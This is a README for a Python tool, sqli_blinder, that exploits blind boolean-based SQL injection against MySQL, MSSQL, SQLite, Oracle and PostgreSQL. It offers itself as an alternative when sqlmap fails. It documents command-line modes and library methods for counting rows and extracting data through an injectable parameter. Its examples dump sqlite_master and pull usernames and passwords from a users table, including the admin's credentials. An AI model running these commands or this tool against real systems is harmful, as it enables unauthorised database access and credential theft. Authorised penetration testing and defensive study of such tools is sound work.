Framework for blind boolean-based sql injections explotation. Use it if sqlmap does shit.
Support:
- MySQL
- MSSQL
- SQLite
- Oracle
- PostgreSQL
Requires Python 3.x.
There are no dependencies, just pip install requests for example request_func, or pip install aiohttp for async example.
You could use sqlib.py console utility or do your own script by importing sqli_blinder.SQLiBlinder, but both cases requires you to create your own request_func.
The request_func must paste single input param to your SQL injection and issue request.
It must return True for input param 1=1 and False for input param 1=0.
It's OK to throw on unexpected behavior.
Example presented in sqlib.py.
Check your request_func with:
SQLiBlinder(request_func,dbms).check()If you want to use sqlib.py - replace request_func with your own.
Limitation of standart version is that it works sequentially. Multithreading is applied only for string chars search. When string is found, it use single thread to determine length of next string and etc.
Async allows make more task simultaniously, so it is supposed to be faster.
But it require you to make async request_func. You could use one of python HTTP async clients such as aiohttp or make requests async.
You can find example of async request_func in sqlib_async.py.
sqlib_async.py use same syntax.
usage: sqlib.py [-h] [-t TABLE] [-c COLUMN] [-w WHERE] [-i INDEX]
[--threads THREADS] --dbms {mysql,mssql,sqlite,oracle,postgre}
{check,count,one,get}
positional arguments:
{check,count,one,get}
mode - one of ['check','count','one','get']
optional arguments:
-h, --help show this help message and exit
-t TABLE, --table TABLE
table nmae
-c COLUMN, --column COLUMN
column names. For get mode could by comma separated array of columns
-w WHERE, --where WHERE
where clause
-i INDEX, --index INDEX
index of row
--threads THREADS number of threads
--dbms {mysql,mssql,sqlite,oracle} DBMS
--order-by ORDER_BY order by column name or index
-s, --silent not print output during retrieving
Examples:
Check request_func:
python sqlib.py check
Get count of rows in sqlite_master table (like SELECT count(*) FROM sqlite_master):
python sqlib.py count -t sqlite_master --dbms sqlite
Get number of rows in users table where username=admin (likeSELECT count(*) FROM users WHERE username='admin'):
python sqlib.py count -t users --dbms sqlite --where "username='admin'"
Get value of password column in users table with index 1 (like SELECT password FROM users offset 1 limit 1):
python sqlib.py one -t users -c password -i 1 --dbms sqlite
Get all username and password from users table (like SELECT username,password FROM users):
python sqlib.py get -t users -c username,password --dbms sqlite
Intended public methods:
-
check()- check providedrequest_funcwith1=1and1=0payloads -
get_count(table_name,where=None)- get count of rows intablewith providedwhereclause -
get_string(table,column,index,where=None)- get value ofcolumnintablewith index=index.whereis optional -
get(columns,table_name,where=None)- get all columns incolumnsfromtablewherewhere
examples:
sqlib = SQLiBlinder(request_func,'sqlite',multithreaded=True,threads=16)
sqlib.check() # True
sqlib.get_count('sqlite_master') # number of rows in sqlite_master
sqlib.get_string('sqlite_master','sql',1,) # code of first table
sqlib.get(['username','password'],'users') # all usernames and passwords
sqlib.get(['username','password'],'users',where="username='admin'") # admins username and password